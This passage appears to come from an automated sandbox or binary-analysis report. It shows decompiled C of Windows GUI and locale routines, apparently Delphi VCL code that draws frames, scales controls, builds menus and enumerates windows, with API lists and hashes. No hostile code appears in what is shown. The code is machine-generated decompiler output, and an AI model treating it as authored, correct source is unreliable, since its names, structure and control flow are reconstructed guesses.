				void* _t190;
				intOrPtr _t191;

				_t152 = __ecx;
				_t188 = _t190;
				_t191 = _t190 + 0xffffffdc;
				_push(_t181);
				_t150 = __eax;
				_t85 = E0043A424(__eax, _t158);
				_t193 =  *((char*)(_t150 + 0x165));
				if( *((char*)(_t150 + 0x165)) == 0) {
					return _t85;
				} else {
					_v8 = E0041FD3C(_t152, 1);
					 *[fs:eax] = _t191;
					E00434750(_v8, _t150);
					 *((intOrPtr*)( *_t150 + 0x44))( *[fs:eax], 0x42d0f1, _t188);
					E0041FBEC( *((intOrPtr*)(_v8 + 0x14)),  *_t150,  *((intOrPtr*)(_t150 + 0x70)), _t181, _t188, _t193);
					E004202C0(_v8,  &_v24);
					InflateRect( &_v24, 0xffffffff, 0xffffffff);
					E004202C0(_v8,  &_v24);
					if( *((char*)(_t150 + 0x165)) != 0) {
						_t186 = 0;
						if( *((char*)(_t150 + 0x163)) != 0) {
							_t186 = 0 +  *((intOrPtr*)(_t150 + 0x168));
						}
						if( *((char*)(_t150 + 0x164)) != 0) {
							_t186 = _t186 +  *((intOrPtr*)(_t150 + 0x168));
						}
						_t199 = _t186;
						if(_t186 == 0) {
							 *((intOrPtr*)( *_t150 + 0x44))();
							E0041FBEC( *((intOrPtr*)(_v8 + 0x14)),  *_t150,  *((intOrPtr*)(_t150 + 0x70)), _t181, _t188, _t199);
							E004202C0(_v8,  &_v24);
							InflateRect( &_v24, 0xffffffff, 0xffffffff);
							E004202C0(_v8,  &_v24);
						}
						 *((intOrPtr*)( *_t150 + 0x44))();
						E00435514(_t150,  &_v40);
						_t183 = GetWindowLongA(E00420704(_v8), 0xfffffff0);
						if(( *(_t150 + 0x162) & 0x00000001) != 0) {
							_v40 = _v40 - _t186;
						}
						if(( *(_t150 + 0x162) & 0x00000002) != 0) {
							_v36 = _v36 - _t186;
						}
						if(( *(_t150 + 0x162) & 0x00000004) != 0) {
							_v32 = _v32 + _t186;
						}
						if((_t183 & 0x00200000) != 0) {
							_v32 = _v32 + GetSystemMetrics(0x14);
						}
						if(( *(_t150 + 0x162) & 0x00000008) != 0) {
							_v28 = _v28 + _t186;
						}
						if((_t183 & 0x00100000) != 0) {
							_v28 = _v28 + GetSystemMetrics(0x15);
						}
						DrawEdge(E00420704(_v8),  &_v24,  *0x00476834 |  *0x00476844,  *0x00476854 |  *0x00476864 | 0x00002000);
						_v24.left = _v24.right - GetSystemMetrics(0xa) - 1;
						if(E0042B758(_t150) == 0) {
							DrawFrameControl(E00420704(_v8),  &_v24, 3, 0x4005);
						} else {
							DrawFrameControl(E00420704(_v8),  &_v24, 3, 0x4005);
						}
					}
					_pop(_t165);
					 *[fs:eax] = _t165;
					_push(0x42d0f8);
					return E004035DC(_v8);
				}
			}

APIs

Part of subcall function 0041FD3C: RtlInitializeCriticalSection.KERNEL32(004234C4,0042348C,00000000,00000001,00423622,?,?,00000000,0042488D,?,?,0041FEAE), ref: 0041FD5C

Part of subcall function 004202C0: FrameRect.USER32 ref: 004202E8

InflateRect.USER32(?,000000FF,000000FF), ref: 0042CF39
InflateRect.USER32(?,000000FF,000000FF), ref: 0042CFA5
GetWindowLongA.USER32 ref: 0042CFD4
GetSystemMetrics.USER32 ref: 0042D009
GetSystemMetrics.USER32 ref: 0042D027
DrawEdge.USER32(00000000,?,00000000,00000008), ref: 0042D087
GetSystemMetrics.USER32 ref: 0042D08E
DrawFrameControl.USER32 ref: 0042D0BB

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsRectSystem$DrawFrameInflate$ControlCriticalEdgeInitializeLongSectionWindow
String ID:
API String ID: 1475008941-0
Opcode ID: a6c28e7db0a94345288ba80302c25785e9ab782877354c737774435ecb367ad0
Instruction ID: 6acb97b55e3052391140d43799a60e2398efebc06591f39235f9b2ffc20e95ca
Opcode Fuzzy Hash: a6c28e7db0a94345288ba80302c25785e9ab782877354c737774435ecb367ad0
Instruction Fuzzy Hash: 9761E670B002059BCB00DF69DD85BDEB7F5AF45308F5501BAF804AB2A6D739AE05CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00435790, Relevance: 13.6, APIs: 9, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00435790(intOrPtr* __eax, int __ecx, int __edx) {
				char _t62;
				signed int _t64;
				signed int _t65;
				signed char _t107;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t117;
				intOrPtr* _t118;
				int _t119;
				int* _t121;

				 *_t121 = __ecx;
				_t117 = __edx;
				_t118 = __eax;
				if(__edx ==  *_t121) {
					L29:
					_t62 =  *0x43593c; // 0x0
					 *((char*)(_t118 + 0x98)) = _t62;
					return _t62;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_t107 =  *0x435934; // 0x1f
				} else {
					_t107 =  *((intOrPtr*)(__eax + 0x98));
				}
				if((_t107 & 0x00000001) == 0) {
					_t119 =  *(_t118 + 0x40);
				} else {
					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
				}
				if((_t107 & 0x00000002) == 0) {
					_t121[1] =  *(_t118 + 0x44);
				} else {
					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
				}
				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
					_t64 =  *(_t118 + 0x48);
					_t121[2] = _t64;
				} else {
					if((_t107 & 0x00000001) == 0) {
						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
						_t121[2] = _t64;
					} else {
						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
						_t121[2] = _t64;
					}
				}
				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
					_t121[3] =  *(_t118 + 0x4c);
				} else {
					if(_t65 == 0) {
						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
					} else {
						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
					}
				}
				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
				_t113 =  *0x43593c; // 0x0
				if(_t113 != (_t107 &  *0x435938)) {
					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
				}
				_t114 =  *0x43593c; // 0x0
				if(_t114 != (_t107 &  *0x435940)) {
					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
				}
				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
					E0041F6A0( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E0041F684( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
				}
				goto L29;
			}

APIs

MulDiv.KERNEL32(?,?,?), ref: 004357C9
MulDiv.KERNEL32(?,?,?), ref: 004357E3
MulDiv.KERNEL32(?,?,?), ref: 00435811
MulDiv.KERNEL32(?,?,?), ref: 00435827
MulDiv.KERNEL32(?,?,?), ref: 0043585F
MulDiv.KERNEL32(?,?,?), ref: 00435877
MulDiv.KERNEL32(?,?,0000001F), ref: 004358C1
MulDiv.KERNEL32(?,?,0000001F), ref: 004358EA
MulDiv.KERNEL32(00000000,?,0000001F), ref: 00435910

Part of subcall function 0041F6A0: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041F6AD

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f18b265cd14c24dbb295db7c30f8ffc70c31fde34f80517ba9dce50c36a8a084
Instruction ID: 05f91db2dc5494731da7da7d01eb392dfc31b18e536d8bce9be381cbbad03249
Opcode Fuzzy Hash: f18b265cd14c24dbb295db7c30f8ffc70c31fde34f80517ba9dce50c36a8a084
Instruction Fuzzy Hash: 4F514D70604B40AFC320EF69C845B6BBBE8AF49354F04582EB9D6D7352C639EC55CB29

Uniqueness

Uniqueness Score: -1.00%

Function 00436630, Relevance: 13.6, APIs: 9, Instructions: 122
windowCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00436630(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v5;
				struct HWND__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				int _t76;
				intOrPtr _t82;
				int _t85;
				void* _t90;
				int _t91;
				void* _t94;
				void* _t95;
				intOrPtr _t96;

				_t94 = _t95;
				_t96 = _t95 + 0xffffffe0;
				_v5 = __ecx;
				_t76 =  *((intOrPtr*)( *__edx + 0x38))();
				if(_v5 == 0) {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t90);
				} else {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t90);
				}
				_v12 = GetDesktopWindow();
				_v16 = GetDCEx(_v12, 0, 0x402);
				_push(_t94);
				_push(0x43674b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t96;
				_v20 = SelectObject(_v16, E0041FC20( *((intOrPtr*)(_t90 + 0x40))));
				_t91 = _v36;
				_t85 = _v32;
				PatBlt(_v16, _t91 + _t76, _t85, _v28 - _t91 - _t76, _t76, 0x5a0049);
				PatBlt(_v16, _v28 - _t76, _t85 + _t76, _t76, _v24 - _t85 - _t76, 0x5a0049);
				PatBlt(_v16, _t91, _v24 - _t76, _v28 - _v36 - _t76, _t76, 0x5a0049);
				PatBlt(_v16, _t91, _t85, _t76, _v24 - _v32 - _t76, 0x5a0049);
				SelectObject(_v16, _v20);
				_pop(_t82);
				 *[fs:eax] = _t82;
				_push(0x436752);
				return ReleaseDC(_v12, _v16);
			}

0x00436631
0x00436633
0x00436639
0x00436645
0x0043664b
0x0043665b
0x00436662
0x00436663
0x00436664
0x00436665
0x00436666
0x0043664d
0x0043664d
0x00436654
0x00436655
0x00436656
0x00436657
0x00436658
0x00436658
0x0043666c
0x0043667f
0x00436684
0x00436685
0x0043668a
0x0043668d
0x004366a2
0x004366ae
0x004366b6
0x004366c3
0x004366e5
0x00436704
0x0043671e
0x0043672b
0x00436732
0x00436735
0x00436738
0x0043674a

APIs

GetDesktopWindow.USER32 ref: 00436667
GetDCEx.USER32(?,00000000,00000402), ref: 0043667A
SelectObject.GDI32(?,00000000), ref: 0043669D
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 004366C3
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 004366E5
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 00436704
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043671E
SelectObject.GDI32(?,?), ref: 0043672B
ReleaseDC.USER32 ref: 00436745

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$DesktopReleaseWindow
String ID:
API String ID: 1187665388-0
Opcode ID: 3af015690ce18ae6242266858263dd2f7745444665cade0dbcb6e78d57d44699
Instruction ID: 36a13c0f66b3c7accd49027f9abdca4b27dd93f0e51766844771ffcb45b04fd4
Opcode Fuzzy Hash: 3af015690ce18ae6242266858263dd2f7745444665cade0dbcb6e78d57d44699
Instruction Fuzzy Hash: AF313D75A00219BFDB00DEEDCC89DAFBBBCEF49704B018469B504F7241C679AD008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF8C, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
threadCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040AF8C(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40b257);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040AE18();
				E00409A60(__ebx, __edi, __esi);
				_t196 =  *0x4927fc;
				if( *0x4927fc != 0) {
					E00409C38(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E004099B0(_t43, 0, 0x14,  &_v20);
				E0040439C(0x492730, _v20);
				E004099B0(_t43, 0x40b26c, 0x1b,  &_v24);
				 *0x492734 = E0040879C(0x40b26c, 0, _t196);
				E004099B0(_t132, 0x40b26c, 0x1c,  &_v28);
				 *0x492735 = E0040879C(0x40b26c, 0, _t196);
				 *0x492736 = E004099FC(_t132, 0x2c, 0xf);
				 *0x492737 = E004099FC(_t132, 0x2e, 0xe);
				E004099B0(_t132, 0x40b26c, 0x19,  &_v32);
				 *0x492738 = E0040879C(0x40b26c, 0, _t196);
				 *0x492739 = E004099FC(_t132, 0x2f, 0x1d);
				E004099B0(_t132, "m/d/yy", 0x1f,  &_v40);
				E00409CE8(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E0040439C(0x49273c, _v36);
				E004099B0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E00409CE8(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E0040439C(0x492740, _v44);
				 *0x492744 = E004099FC(_t132, 0x3a, 0x1e);
				E004099B0(_t132, 0x40b2a0, 0x28,  &_v52);
				E0040439C(0x492748, _v52);
				E004099B0(_t132, 0x40b2ac, 0x29,  &_v56);
				E0040439C(0x49274c, _v56);
				E00404348( &_v12);
				E00404348( &_v16);
				E004099B0(_t132, 0x40b26c, 0x25,  &_v60);
				_t104 = E0040879C(0x40b26c, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E004043E0( &_v8, 0x40b2c4);
				} else {
					E004043E0( &_v8, 0x40b2b8);
				}
				E004099B0(_t132, 0x40b26c, 0x23,  &_v64);
				_t111 = E0040879C(0x40b26c, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E004099B0(_t132, 0x40b26c, 0x1005,  &_v68);
					if(E0040879C(0x40b26c, 0, _t198) != 0) {
						E004043E0( &_v12, 0x40b2e0);
					} else {
						E004043E0( &_v16, 0x40b2d0);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E004046C0();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E004046C0();
				 *0x4927fe = E004099FC(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040B25E);
				return E0040436C( &_v68, 0x10);
			}

APIs

GetThreadLocale.KERNEL32(00000000,0040B257,?,?,00000000,00000000), ref: 0040AFC2

Part of subcall function 004099B0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099CE

Strings

:mm:ss, xrefs: 0040B212
:mm, xrefs: 0040B1F5
AMPM , xrefs: 0040B1E5
mmmm d, yyyy, xrefs: 0040B0BE
AMPM, xrefs: 0040B1D6
m/d/yy, xrefs: 0040B091

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: c7280590449ea807df80cb4063d335bb700ae5b4b0721a30384d7ff1e223ad86
Instruction ID: f7b0a5c8af3475563ed6979dcd4d7b42db68775136df7043b35d506b5f104953
Opcode Fuzzy Hash: c7280590449ea807df80cb4063d335bb700ae5b4b0721a30384d7ff1e223ad86
Instruction Fuzzy Hash: 8F614A707002089BDB00EBE6D991A9F76A6EB88304F10947FA640BB3D6DB7CDD05979C

Uniqueness

Uniqueness Score: -1.00%

Function 00445400, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 187
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00445400(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v13;
				struct tagMENUITEMINFOA _v61;
				char _v68;
				intOrPtr _t103;
				CHAR* _t109;
				char _t115;
				short _t149;
				void* _t154;
				intOrPtr _t161;
				intOrPtr _t184;
				struct HMENU__* _t186;
				int _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t196;
				void* _t205;

				_t155 = __ecx;
				_v68 = 0;
				_v12 = 0;
				_v5 = __ecx;
				_t186 = __edx;
				_t154 = __eax;
				_push(_t196);
				_push(0x44565b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196 + 0xffffffc0;
				if( *((char*)(__eax + 0x3e)) == 0) {
					L22:
					_pop(_t161);
					 *[fs:eax] = _t161;
					_push(0x445662);
					E00404348( &_v68);
					return E00404348( &_v12);
				}
				E004043E0( &_v12,  *((intOrPtr*)(__eax + 0x30)));
				if(E0044723C(_t154) <= 0) {
					__eflags =  *((short*)(_t154 + 0x60));
					if( *((short*)(_t154 + 0x60)) == 0) {
						L8:
						if((GetVersion() & 0x000000ff) < 4) {
							_t190 =  *(0x476ad0 + ((E00404744( *((intOrPtr*)(_t154 + 0x30)), 0x445680) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x00476AC4 |  *0x00476AB4 |  *0x00476ABC | 0x00000400;
							_t103 = E0044723C(_t154);
							__eflags = _t103;
							if(_t103 <= 0) {
								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E004047F8(_v12));
							} else {
								_t109 = E004047F8( *((intOrPtr*)(_t154 + 0x30)));
								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E00445904(_t154), _t109);
							}
							goto L22;
						}
						_v61.cbSize = 0x2c;
						_v61.fMask = 0x3f;
						_t192 = E004477F8(_t154);
						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E00446E14(_t154) == 0) {
							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
								L14:
								_t115 = 0;
								goto L16;
							}
							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
							if(_t205 == 0) {
								goto L15;
							}
							goto L14;
						} else {
							L15:
							_t115 = 1;
							L16:
							_v13 = _t115;
							_v61.fType =  *(0x476b04 + ((E00404744( *((intOrPtr*)(_t154 + 0x30)), 0x445680) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x00476AFC |  *0x00476AD8 |  *0x00476B0C |  *0x00476B14;
							_v61.fState =  *0x00476AE4 |  *0x00476AF4 |  *0x00476AEC;
							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
							_v61.hSubMenu = 0;
							_v61.hbmpChecked = 0;
							_v61.hbmpUnchecked = 0;
							_v61.dwTypeData = E004047F8(_v12);
							if(E0044723C(_t154) > 0) {
								_v61.hSubMenu = E00445904(_t154);
							}
							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
							goto L22;
						}
					}
					_t193 =  *((intOrPtr*)(_t154 + 0x64));
					__eflags = _t193;
					if(_t193 == 0) {
						L7:
						_push(_v12);
						_push(0x445674);
						E00444A64( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
						_push(_v68);
						E004046C0();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t193 + 0x64));
					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
						goto L7;
					}
					_t184 =  *0x4442f4; // 0x444340
					_t149 = E00403768( *((intOrPtr*)(_t193 + 4)), _t184);
					__eflags = _t149;
					if(_t149 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v61.hSubMenu = E00445904(_t154);
				goto L8;
			}

APIs

InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 004455AC
GetVersion.KERNEL32(00000000,0044565B), ref: 0044549C

Part of subcall function 00445904: CreatePopupMenu.USER32(?,00445617,00000000,00000000,0044565B), ref: 0044591F

Strings

,, xrefs: 004454B0
@CD, xrefs: 00445469
?, xrefs: 004454B7

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$CreateInsertItemPopupVersion
String ID: ,$?$@CD
API String ID: 133695497-3742550023
Opcode ID: 751d677e1906d0730ff5f3084fbc4bb296e71803ac61173649860844270ef62d
Instruction ID: 7ebd36ed19c46884f593e8d40177bac7499cd1e850afad9049dc4fc8f031cc35
Opcode Fuzzy Hash: 751d677e1906d0730ff5f3084fbc4bb296e71803ac61173649860844270ef62d
Instruction Fuzzy Hash: 4B61F270A006449BEF10EF79D8816AA7BF6AF4A314B46447AE844EB397D738D845C718

Uniqueness

Uniqueness Score: -1.00%

Function 00433500, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 139
threadCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00433500(intOrPtr __eax, void* __ecx, char _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				void* _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t94;
				intOrPtr _t99;
				intOrPtr _t102;
				void* _t103;
				intOrPtr* _t105;
				intOrPtr _t107;
				intOrPtr _t111;
				intOrPtr _t113;
				struct HWND__* _t114;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t118;

				_t103 = __ecx;
				_t102 = __eax;
				_v5 = 1;
				_t2 =  &_a4; // 0x433821
				_t114 = E00433938( *_t2 + 0xfffffff7);
				_v24 = _t114;
				_t53 = GetWindow(_t114, 4);
				_t105 =  *0x49111c; // 0x492c04
				if(_t53 ==  *((intOrPtr*)( *_t105 + 0x30))) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5;
					}
					_t115 = _t102;
					while(1) {
						_t55 =  *((intOrPtr*)(_t115 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t115 = _t55;
					}
					_t113 = E0043C1F4(_t115);
					_v28 = _t113;
					if(_t113 == _v24) {
						goto L25;
					}
					_t12 =  &_a4; // 0x433821
					_t60 =  *((intOrPtr*)( *((intOrPtr*)( *_t12 - 0x10)) + 0x30));
					if(_t60 == 0) {
						_t18 =  &_a4; // 0x433821
						_t107 =  *0x431d04; // 0x431d50
						__eflags = E00403768( *((intOrPtr*)( *_t18 - 0x10)), _t107);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t20 =  &_a4; // 0x433821
							_v32 = E0043C1F4( *((intOrPtr*)( *_t20 - 0x10)));
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						EnumThreadWindows(GetCurrentThreadId(), E00433494,  &_v32);
						_t127 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						E004037D8(_t102, _t127);
						_t79 =  *0x492b8c; // 0x0
						_t111 =  *0x430ae0; // 0x430b2c
						if(E00403768(_t79, _t111) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t85 =  *0x492b8c; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x38)) + 0xa0)) == 0) {
							goto L23;
						}
						_t87 =  *0x492b8c; // 0x0
						if(E0043C1F4( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x38)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t117 = _t60;
					while(1) {
						_t94 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t94 == 0) {
							break;
						}
						_t117 = _t94;
					}
					_v32 = E0043C1F4(_t117);
					goto L19;
				}
				_t118 = E00432A88(_v24, _t103);
				if(_t118 == 0) {
					goto L25;
				} else {
					while(1) {
						_t99 =  *((intOrPtr*)(_t118 + 0x30));
						if(_t99 == 0) {
							break;
						}
						_t118 = _t99;
					}
					_v24 = E0043C1F4(_t118);
					goto L6;
				}
			}

0x00433500
0x00433509
0x0043350b
0x0043350f
0x0043351a
0x0043351c
0x00433522
0x00433527
0x00433532
0x0043355b
0x0043355f
0x0043368e
0x00433697
0x00433697
0x00433565
0x0043356b
0x0043356b
0x00433570
0x00000000
0x00000000
0x00433569
0x00433569
0x00433579
0x0043357b
0x00433581
0x00000000
0x00000000
0x00433587
0x0043358d
0x00433592
0x004335b0
0x004335b6
0x004335c1
0x004335c3
0x004335d5
0x004335d7
0x004335c5
0x004335c5
0x004335d0
0x004335d0
0x004335da
0x004335da
0x004335de
0x004335e4
0x004335ea
0x004335fc
0x00433601
0x00433605
0x00000000
0x00000000
0x00433613
0x0043361e
0x00433623
0x00433633
0x00433638
0x0043363d
0x0043364a
0x00433675
0x00433688
0x0043368a
0x0043368a
0x00000000
0x00433688
0x0043364c
0x0043365b
0x00000000
0x00000000
0x0043365d
0x00433673
0x00000000
0x00000000
0x00000000
0x00433673
0x00433597
0x0043359d
0x0043359d
0x004335a2
0x00000000
0x00000000
0x0043359b
0x0043359b
0x004335ab
0x00000000
0x004335ab
0x0043353c
0x00433540
0x00000000
0x00433546
0x0043354a
0x0043354a
0x0043354f
0x00000000
0x00000000
0x00433548
0x00433548
0x00433558
0x00000000
0x00433558

APIs

Part of subcall function 00433938: WindowFromPoint.USER32(!8C,?,00000000,0043351A,?,-0000000C,?), ref: 0043393E
Part of subcall function 00433938: GetParent.USER32(00000000), ref: 00433955

GetWindow.USER32(00000000,00000004), ref: 00433522
GetCurrentThreadId.KERNEL32 ref: 004335F6
EnumThreadWindows.USER32(00000000,00433494,?), ref: 004335FC
GetWindowRect.USER32 ref: 00433613
IntersectRect.USER32 ref: 00433681

Part of subcall function 00432A88: GlobalFindAtomA.KERNEL32 ref: 00432A9C
Part of subcall function 00432A88: GetPropA.USER32 ref: 00432AB3

Strings

!8C, xrefs: 00433627, 004335DE, 0043361F, 00433618
!8C, xrefs: 0043350F, 00433587, 004335B0, 004335C5, 00433594

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

